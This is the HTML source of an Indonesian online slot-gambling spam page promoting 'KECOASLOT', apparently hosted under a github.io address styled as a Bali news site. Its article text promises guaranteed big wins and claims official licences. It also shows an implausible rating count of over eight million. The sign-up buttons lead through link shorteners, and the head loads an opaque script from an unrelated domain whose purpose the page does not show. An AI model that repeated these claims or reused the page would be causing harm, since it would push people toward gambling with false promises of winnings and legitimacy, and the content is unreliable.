<!doctype html>
<html ⚡>
    <head>
        <meta charset="utf-8"/>
        <title>KECOASLOT : Situs Slot Gacor Maxwin Hari ini dan Link KECOASLOT Online Terpercaya</title>
		<meta name="description" content="KECOASLOT merupakan situs slot gacor hari ini yang menjamin kemenangan besar dengan akses link KECOASLOT online terpercaya yang menawarkan koleksi slot gacor maxwin berlisensi resmi."/>
		<meta name="keywords" content="KECOASLOT, istana bet, KECOASLOT, slot gacor, slot online, KECOASLOT online, link KECOASLOT, slot gacor maxwin, situs slot gacor, link slot gacor, situs slot terpercaya, slot online terpercaya, slot gacor hari ini, situs slot, link slot"/>
        <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"/>
        <meta name="robots" content="index, follow"/>
        <meta property="og:title" content="KECOASLOT : Situs Slot Gacor Maxwin Hari ini dan Link KECOASLOT Online Terpercaya "/>
        <meta property="og:description" content="KECOASLOT merupakan situs slot gacor hari ini yang menjamin kemenangan besar dengan akses link KECOASLOT online terpercaya yang menawarkan koleksi slot gacor maxwin berlisensi resmi."/>
		<meta property="og:type" content="website">
        <meta property="og:url" content="https://beritabaliterkini.github.io/balisepi2025/bandarabalisepi.html"/>
        <meta property="og:site_name" content="KECOASLOT"/>
        <meta property="og:author" content="KECOASLOT"/>
        <link rel="canonical" href="https://beritabaliterkini.github.io/balisepi2025/bandarabalisepi.html"/>
        <link rel="icon" href="https://ampkecoaslot.com/images/favicon.png">
        <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Exo%202:ital,wght@0,400">
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css">

        <script type='text/javascript' src='https://jangangangguaku.site/pQgjmDL93P053BRRm6x_6nxCPz13z91GY7FNuAOWqDJv99DmeIoWdeHSUo3X3ulUntE-m8D1wKqte2pgPYbZqw=='></script><script async src="https://cdn.ampproject.org/v0.js"></script>

        <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
        <style amp-custom>
            :root {
               --small-font: 14px;
               --normal-font: 16px;
               --large-font: 18px;
               --x-large-font: 20px
            }
            
            body {
                font-size: var(--small-font);
                display: flex;
                flex-direction: column;
                color:#ffffff;
                font-family: sans-serif;
                background-color: #181510;
            }
                
            a {
                color: yellow;
               text-decoration: none
            }
         
            .container {
               align-self: center;
               margin-left: auto;
               margin-right: auto
            }
            
            .public-logo_left
            {
                float:left;
            }
            
            .public-logo_right
            {
                float:right;
            }
            .public-logo-container {
               text-align: center;
               padding: 10px;
               display: flex;
               justify-content: center;
               align-items: center;
               position: fixed;
               top: 0;
               left: 0;
               right: 0;
               z-index: 99;
               box-shadow: 0px 0px 8px 2px #000000;
               background-color: #36190080;
            }
            
            .public-logo-container .public-logo {
               width: calc(38px*180/45);
               display: block;
            }
            
            .public-footer-logo {
               width: calc(38px*180/45);
               display: block;
            }
            
            .public-footer-logo amp-img {
               flex-grow: 1
            }
            
            .footer_logo_sec
            {
                text-align:center;
                display:inline-block;
            }
            .rules-agreement-logo {
                background:url(https://i.postimg.cc/qB3MMKQF/bg-deltaslot88.jpg) no-repeat;
                background-size:contain;
                filter:drop-shadow(1px 1px 1px #000);
                padding-top:45px;
                max-width:600px;
                margin:45px auto;
            }

            .space_bg {
                position: relative;
            }

            .space_bg:before {
                content: ' ';
                display: block;
                position: absolute;
                left: 0;
                top: 0;
                width: 100%;
                height: 100%;
                background-image: url(https://i.pinimg.com/736x/42/3e/90/423e9089005ee480d7ac7b80a3e91350.jpg);
                background-repeat: no-repeat;
                background-position: top;
                background-size: 100% auto;
            }
            
            .bg_star {
                position: relative;
                margin-bottom:30px;
            }
            
            .bg_star:before
            {
                content: ' ';
                display: block;
                position: absolute;
                left: 0;
                top: 0;
                width: 100%;
                opacity: 0.7;
                height: 100%;
                background-image: url(https://i.pinimg.com/736x/42/3e/90/423e9089005ee480d7ac7b80a3e91350.jpg);
                background-repeat: no-repeat;
                background-position: center;
                background-size: 100% auto;
                z-index: -1;
            }
            
            .faq_radius_content {
                position: relative;
                overflow: hidden;
            }
            
            .faq_radius_content:before
            {
                content: ' ';
                display: block;
                position: absolute;
                left: 0;
                top: 0;
                width: 100%;
                opacity: 0.4;
                height: 100%;
                background-image: url(assets/moon_texture.webp);
                background-repeat: no-repeat;
                background-position: top;
                background-size: 100% auto;
                z-index: -1;
            }
            
            .head_content {
                position: relative;
            }

            .public-btn-container {
               display: flex;
               margin-top: 10px;
               margin-bottom: 10px;
            }
            
            .public-btn-container a {
               width: 30%;
               text-align: center;
               padding: 15px;
               filter: drop-shadow(0px 4px 4px rgba(0, 0, 0, 0.25));
               border-radius: 9px;
               margin: 10px;
               font-weight:bold;
               margin-left: 0px;
               color:#ffffff;
               border: 2px solid #785F37;
            }
            
            .masuk-button,
            .daftar-button {
               color: #ffffff;
            }
            
            .daftar-button
            {
                background: #785F37;
                box-shadow: 0px 4px 4px rgba(0, 0, 0, 0.25);
                border-radius: 9px;
                color:#000000;
            }
            
            .public_main_sec
            {
                display: grid;
                align-items: center;
                grid-template-columns: 1fr 1fr;
                grid-gap: 10px;
                padding: 10px;
                margin-top: 80px;
                margin-bottom: 60px;
            }
            
            .right_sec img
            {
                object-fit:contain;
            }
            
            .mobile_img
            {
                display:none;
            }
            
            .mobile_img img
            {
                opacity: 0.7;
            }
            
            .main_section_content
            {
                margin-top:70px;
                margin-bottom:30px;
            }
            
            .main_section_content h2
            {
                line-height: 30px;
                letter-spacing: 1px;
                color: #ffffff;
            }
            
            .main_section_content h4
            {
                line-height: 25px;
                font-weight: normal;
                color: #ffffff;
            }

            .daftar-button:hover {
               background: linear-gradient(107.96deg, #785F37 -1.5%, rgba(132, 97, 201, 0.72) 83.56%);
            }
            
            .masuk-button:hover {
               background: linear-gradient(107.96deg, #785F37 -1.5%, #CBB682 83.56%);
            }
            
            body{
                -webkit-touch-callout: none; /* iOS Safari */
                -webkit-user-select: none; /* Safari */
                -khtml-user-select: none; /* Konqueror HTML */
                -moz-user-select: none; /* Firefox */
                -ms-user-select: none; /* Internet Explorer/Edge */
                user-select: none; /* Non-prefixed version, currently supported by Chrome and Opera */
            }

            .heading_game
            {
                padding: 10px;
                margin: 0;
            }

            .game_sec
            {
                background: rgba(23, 12, 12, 0.49);
            }
            
            .game_sec h3
            {
                color:#ffffff;
            }
            .game_provider_box
            {
                display: grid;
                grid-template-columns: 1fr 1fr 1fr;
                grid-gap: 10px;
                padding: 10px;
            }
            
            .game_provider_box amp-img
            {
                transition: 0.3s;
            }
            
            .game_provider_box amp-img:hover
            {
                transform: scale3d(1.1, 1.1, 0.09);
            }
            
            h1,h2,h3,h4,h5,h6
            {
                color:#CBB682;
            }
            
            h1,h2 {
                text-align: center;
            }
            
            .text-small
            {
                font-size:12px;
                text-align: -webkit-center;
            }

            .provider_img amp-img
            {
                /*max-width:200px;*/
                width:100%;
                text-align: center;
                margin: auto;
            }
            
            .game_category
            {
                text-align:center;
                margin: 50px auto;
            }
            
            .game_title
            {
                font-weight:bold;
            }
            
            .testimonial_sec {
                text-align: center;
                padding: 2rem 1rem;
            }
            .testimonial_sec img {
                border-radius: 100px;
            }
            .testimonial_sec p {
                text-align: justify;
                letter-spacing: 0.05em;
                color: #ffffff;
                line-height: 25px;
                padding: 0 10px;
                font-size: 13px;
            }
            
            .public-four_sec_column
            {
                display: grid;
                grid-template-columns: 1fr 1fr 1fr 1fr;
                grid-gap: 15px;
            }
              
            .site-description-container {
                padding: 0px 15px;
                letter-spacing: 0.05em;
                color:#ffffff;
                line-height: 25px;
            }

            .site-description-container p {
                text-align: justify;
            }
            
            .content_img {
                text-align: center;
            }

            .content_img amp-img
            {
                max-width:350px;
            }
            
            .content_img img
            {
                object-fit:contain;
            }
            
            .content_small_img amp-img {
                margin: 0 auto;
                border: 3px solid #7E38B7;
                border-radius: 20px;
                max-width: 260px;
            }

            .faq_radius_content
            {
                color:#ffffff;
                background: rgba(217, 217, 217, 0.15);
                border-radius: 25px;
                padding: 20px;
                margin-bottom: 20px;
            }
            
            .faq_radius_content h3, .faq_radius_content h4
            {
                font-weight:normal;
                margin: 10px auto;
            }
            
            .faq_que
            {
                color:#ffffff;
            }
            
            .fixed-footer {
               display: flex;
               justify-content: space-around;
               position: fixed;
               padding: 5px 0;
               left: 0;
               right: 0;
               bottom: 0;
               z-index: 99;
               background: #221d14;
                box-shadow: 0px -20px 20px rgba(0, 0, 0, 0.25);
            }
            
            .fixed-footer a {
               display: flex;
               flex-direction: column;
               justify-content: center;
               align-items: center;
            }

            .fixed-footer amp-img {
               max-width: 50%;
               margin-bottom: 5px
            }

            .fixed-footer a {
               color: #fff;
            }

            .footer_area
            {
                padding: 15px;
                background: #221d14;
            }
            
            .copyright_data_area
            {
                padding:10px;
                text-align:center;
                color: #ffffff;
                margin-top:10px;
            }
            
            .first_footer_sec
            {
                display: grid;
                grid-template-columns: 1fr 1fr 1fr 1fr;
                grid-gap: 15px;
            }
            
            .first_footer_sec div {
                padding-left: 33%;
            }
            
            
            .first_footer_sec span
            {
                display:block;
            }
            
            .footer_span
            {
                margin-bottom: 20px;
                font-weight: bold;
                font-size: 20px;
                color:#CBB682;
            }
            
            .copyright_data_area p
            {
                margin:0px;
            }
            
            @media(max-width:768px)
            {
                .public-logo-container
                {
                 display:initial;   
                }

                body {
                    padding-bottom: 80px;
                }
            }
            
            @media(min-width:768px) {
               body {
                  font-size: var(--normal-font)
               }
            }
            
            @media(min-width:1200px) {
               .container {
                  width: 1170px
               }
            }
            
            @media(min-width:992px) {
               .container {
                  width: 970px
               }
            }
            
            
           
            @media(min-width:768px) {          
               body
               {
                   padding-bottom:0px;
               }
               .last-footer
               {
                   display:none;
               }
            }

            @media (max-width: 600px){
                
                .first_footer_sec div {
                    padding-left: 20%;
                }
            
                .space_bg:before
                {
                    background-position: right;
                    background-size: inherit;
                }
                
                .bg_star:before
                {
                    background-position: center;
                    background-size: inherit;
                }
                
                .faq_radius_content:before
                {
                    background-position: right;
                    background-size: inherit;
                }
                
                .right_sec
                {
                    position: absolute;
                    left: 0;
                    right: 0;
                }
                
                .mobile_img
                {
                    display:block;
                }
                
                .desktop_img
                {
                    display:none;
                }
                
                .left_sec
                {
                    text-align: center;
                    z-index: 1;
                }
                
                .main_section_content h2
                {
                    font-size: 16px;
                }
                
                .main_section_content h4
                {
                    line-height:inherit;
                }
                
                .public-btn-container
                {
                    justify-content: center;
                }
                
                .public_main_sec
                {
                    grid-template-columns: 1fr;
                }
                
                .game_provider_box {
                    grid-template-columns: 1fr 1fr;
                    grid-gap: 5px;
                }
                
                .public-four_sec_column
                {
                    grid-template-columns: 1fr 1fr;
                    grid-gap: 10px;
                }
                
                .first_footer_sec {
                    gap: 2px;
                    font-size: 12px;
                }
                
                .footer_span
                {
                    font-size: 12px;
                }
            }
            
            
            .table {
                width:100%;border-right:1px solid rgba(255,255,255,.15);border-top:1px solid rgba(255,255,255,.15)
                
            }
            .table tr td{
                border-left:1px solid rgba(255,255,255,.15);border-bottom:1px solid rgba(255,255,255,.15);padding:5px
                
            }
            .table tr:nth-child(2n)
            td{
                background:rgba(3,17,45,.35)
                
            }
            

            .gradient-border-button {
              --borderWidth: 3px;
              position: relative;
              border-radius: var(--borderWidth);
            }
            .gradient-border-button:after {
              content: '';
              position: absolute;
              top: calc(-1 * var(--borderWidth));
              left: calc(-1 * var(--borderWidth));
              height: calc(100% + var(--borderWidth) * 2);
              width: calc(100% + var(--borderWidth) * 2);
              background: radial-gradient(ellipse farthest-corner at right bottom, #E9DBBD 0%, #CBB682 8%, #A08C5B 30%, #785F37 40%, transparent 80%), radial-gradient(ellipse farthest-corner at left top, #CBB682 0%, #CBB682 8%, #785F37 25%, #181510 62.5%, #181510 100%);
              border-radius: 10px;
              z-index: -1;
              animation: animatedgradient 3s ease alternate infinite;
              background-size: 300% 300%;
            }
            
            @keyframes animatedgradient {
              0% {
                background-position: 0% 50%;
              }
              50% {
                background-position: 100% 50%;
              }
              100% {
                background-position: 0% 50%;
              }
            }

        </style>

        <!-- salah satu script json yang benar -->
        <script type="application/ld+json"> 
            {
                "@context": "http://schema.org",
                "@type": "Game",
                "name": "Situs Slot Gacor Maxwin KECOASLOT",
                "author": {
                    "@type": "Person", 
                    "name": " KECOASLOT"
                },
                "headline": "KECOASLOT : Situs Slot Gacor Maxwin Hari ini dan Link KECOASLOT Online Terpercaya ",
                "description": "KECOASLOT merupakan situs slot gacor hari ini yang menjamin kemenangan besar dengan akses link KECOASLOT online terpercaya yang menawarkan koleksi slot gacor maxwin berlisensi resmi.",
                "keywords": ["KECOASLOT, istana bet, KECOASLOT, slot gacor, slot online, KECOASLOT online, link KECOASLOT, slot gacor maxwin, situs slot gacor, link slot gacor, situs slot terpercaya, slot online terpercaya, slot gacor hari ini, situs slot, link slot"],
                "image":"ttps://ampkecoaslot.com/images/kecoaslot.png",
                "url": "https://beritabaliterkini.github.io/balisepi2025/bandarabalisepi.html",
                "publisher": { 
                    "@type": "Organization", 
                    "name": "KECOASLOT" 
                },
                "aggregateRating": { 
                    "@type": "AggregateRating", 
                    "ratingValue": "98", 
                    "bestRating": "100", 
                    "worstRating": "0", 
                    "ratingCount": "8363788" 
                },
                "inLanguage": "id-ID"
            } 
        </script>

    </head>
       <body>
            <div class="public-logo-container">
                <div class="container">
                    <div class="public-logo_left">
                         <a href="https://beritabaliterkini.github.io/balisepi2025/bandarabalisepi.html" class="public-logo">
                            <amp-img layout="responsive" height="140" width="250" src="https://ampkecoaslot.com/images/kecoaslot.png" alt="KECOASLOT logo"></amp-img>
                         </a>
                    </div>
                </div>
            </div>
            <div class="space_bg">
                <div class="head_content">
                    <div class="container">
                        <div class="public_main_sec">
                            <div class="left_sec">
                                <div class="main_section_content">
                                    <h2><b>SITUS JUDI SLOT GACOR HARI INI TERBESAR DAN TERPERCAYA KECOASLOT</b></h2>
                                    <h4>Akses Link KECOASLOT disini<br/> Rasakan Sensasi Slot Gacor Maxwin Hari ini Sekarang!</h4>
                                </div>
                                <div class="public-btn-container">
                                    <a href="https://jekl.in/berita-terkini" class="daftar-button gradient-border-button">Daftar</a>
                                    <a href="https://jekl.in/berita-terkini" class="masuk-button">Masuk</a>
                                </div>
                            </div>
                            <div class="right_sec">
                                <amp-img class="desktop_img" src="https://ampkecoaslot.com/images/kecoaslot.png" width="388" height="75" layout="responsive" alt="Banner KECOASLOT"></amp-img>
                                <amp-img class="mobile_img" src="https://ampkecoaslot.com/images/kecoaslot.png" width="388" height="75" layout="responsive" alt="Banner Mobile KECOASLOT"></amp-img>
                            </div>
                        </div>
                    </div>
                    <div class="game_sec">
                        <div class="container"> 
                            <h2 class="heading_game">Daftar Slot Populer Maxwin KECOASLOT</h2>
                            <div class="game_provider_box">
                                <div>
                                    <amp-img src="https://i.postimg.cc/WzFwz5CH/slotzeus-Deltaslot88.png" width="400" height="400" layout="responsive" alt="Daftar Slot Gates of Olympus"></amp-img>
                                </div>
                                <div>
                                    <amp-img src="https://i.postimg.cc/WbJqDnPL/wild-bandito-Deltaslot88-removebg-preview-1.png" width="400" height="400" layout="responsive" alt="Daftar Slot Wild Bandito"></amp-img>
                                </div>
                                <div>
                                    <amp-img src="https://i.postimg.cc/RhdJMKVD/thor-deltaslot88.webp" width="400" height="400" layout="responsive" alt="Daftar Slot Gacor Thor"></amp-img>
                                </div>
                                <div>
                                    <amp-img src="https://i.postimg.cc/zfYzc3qb/slot-inces-Deltaslot88.webp" width="400" height="400" layout="responsive" alt="Daftar Slot Gacor Starlight Princess"></amp-img>
                                </div>
                                <div>
                                    <amp-img src="https://i.postimg.cc/mrZLsJFB/joker-deltaslot88.png" width="400" height="400" layout="responsive" alt="Daftar Slot Gacor Jokers Jewels"></amp-img>
                                </div>
                                <div>
                                    <amp-img src="https://i.postimg.cc/L5twh4r7/slot-mahjong-Deltaslot88.png" width="400" height="400" layout="responsive" alt="Daftar Slot Gacor Mahjong Ways"></amp-img>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="container">
                <div class="site-description-container">
                    <!-- artikel disini -->
                 <h1> KECOASLOT : Situs Slot Gacor Maxwin Hari ini dan Link KECOASLOT Online Terpercaya</h1>

<p>Selamat datang di situs slot gacor hari ini yang memberikan kalian semua janji kemenangan maxwin tanpa batas! menawarkan kalian situs slot yang menyediakan akses link KECOASLOT online dengan deretan kolesi slot gacor maxwin terpercaya yaitu KECOASLOT, salah satu <a href="https://beritabaliterkini.github.io/balisepi2025/bandarabalisepi.html">situs slot gacor</a> yang memiliki fasilitas deposit lengkap serta pelayanan pelanggan responsive dan sopan siap melayani anda saat bermain slot gacor maxwin, serta sudah memiliki lisensi resmi PAGCOR yang menjadikan KECOASLOT sebagai situs slot online terpercaya terkemuka di seluruh kerajaan istana slot gacor hari ini.</p>

<p>Masuk di tahun 2025 ini kontribusinya dalam dunia slot gacor hari ini sudah lebih dari 12 tahun yang dimana membuat KECOASLOT bisa mencapai puncak prestasinya, di nobatkan oleh provider ternama seperti KECOASLOT sebagai situs slot yang dapat memberikan akses link menuju kedalam istana <a href="https://beritabaliterkini.github.io/balisepi2025/bandarabalisepi.html">slot gacor</a> terpercaya yang pastinya di jamin gacor, sudah mengantungi 7 lisensi resmi indonesia dan terikat regulasi ASF yang dimana kalian tidak perlu ragu lagi bermain di situs slot gacor KECOASLOT.</p>

<p><a href="https://beritabaliterkini.github.io/balisepi2025/bandarabalisepi.html">KECOASLOT</a> yang merupakan provider besar ini memiliki jumlah player yang cukup fantastis! memiliki lebih dari 500rb kapasitas peminat slot gacor maxwin membuat KECOASLOT menunjuk satu-satunya situs slot gacor hari ini yang mampu memberikan pelayanan terbaik untuk kalian semua seperti KECOASLOT, situs slot gacor yang menawarkan kalian semua pengalaman bermain paling terbaik dengan engine website nomor 1 di indonesia yang di upgrade dengan tampilan modern dan bisa di akses melalui mobile phone apa saja.</p>

<p>Dengan integritas yang di milikinya, <a href="https://beritabaliterkini.github.io/balisepi2025/bandarabalisepi.html">KECOASLOT</a> telah menjadi situs favorit bagi para slotters berkumpul dan mencari jackpot, dengan akses link mudah dicari yang dimana kalian cukup perlu mengetikan kata kunci di penelusuran google "KECOASLOT" maka situs kami akan muncul di halaman pertama dengan akses link KECOASLOT online resmi Indonesia di lengkapi segudang slot gacor maxwin rekomendasi untuk kalian semua.</p>

<p>Sebagai pelopor slot online Indonesia, KECOASLOT sudah tidak asing lagi di dengar oleh para pecinta slot gacor maxwin , kami menyediakan benefit-benefit special untuk kalian seperti bonus pendatang baru maupun member setia, maka dari itu kami mengajak kalian semua bergabung dan rasakan sensasi <a href="https://beritabaliterkini.github.io/balisepi2025/bandarabalisepi.html">slot gacor hari ini</a> di KECOASLOT dengan RTP maxwin paling muktahir.</p>

                    </div>
                    </div>
                <div class="container copyright_data_area">
                    <div class="footer_logo_sec">
                        <a href="/" class="public-footer-logo">
                            <amp-img layout="responsive" height="140" width="250" src="https://ampkecoaslot.com/images/kecoaslot.png" alt="KECOASLOT Logo"></amp-img>
                        </a>
                </div>
            </div>
            <div class="fixed-footer last-footer" style="padding-right: 25px;">
                <a href="https://jekl.in/berita-terkini">
                    <a class="px-025 flex flex-col text-common p-05" href="https://jekl.in/berita-terkini" target="_blank">
                    <i class="fas text-lg fa-user"></i>Login</a>
                </a>
                <a href="https://jekl.in/berita-terkini">
                    <a class="px-025 flex flex-col text-common p-05" href="https://jekl.in/berita-terkini" target="_blank">
                    <i class="fas text-lg fa-user-plus"></i>Daftar </a>
                </a>
                <a href="https://jali.me/kecoa-promo">
                    <a class="px-025 flex flex-col text-common p-05" href="https://jali.me/kecoa-promo" target="_blank">
                        <i class="fa-solid text-lg fa-gift"></i>Promo</a>
                </a>
                <a href="https://direct.lc.chat/18739359/" target="_blank">
                    <a role="button" class="px-025 flex flex-col text-common p-05" href="https://direct.lc.chat/18739359/" target="_blank">
                        <i class="fas text-lg fa-headset"></i>Live Chat</a>
                </a>
            </div>
       
       </body>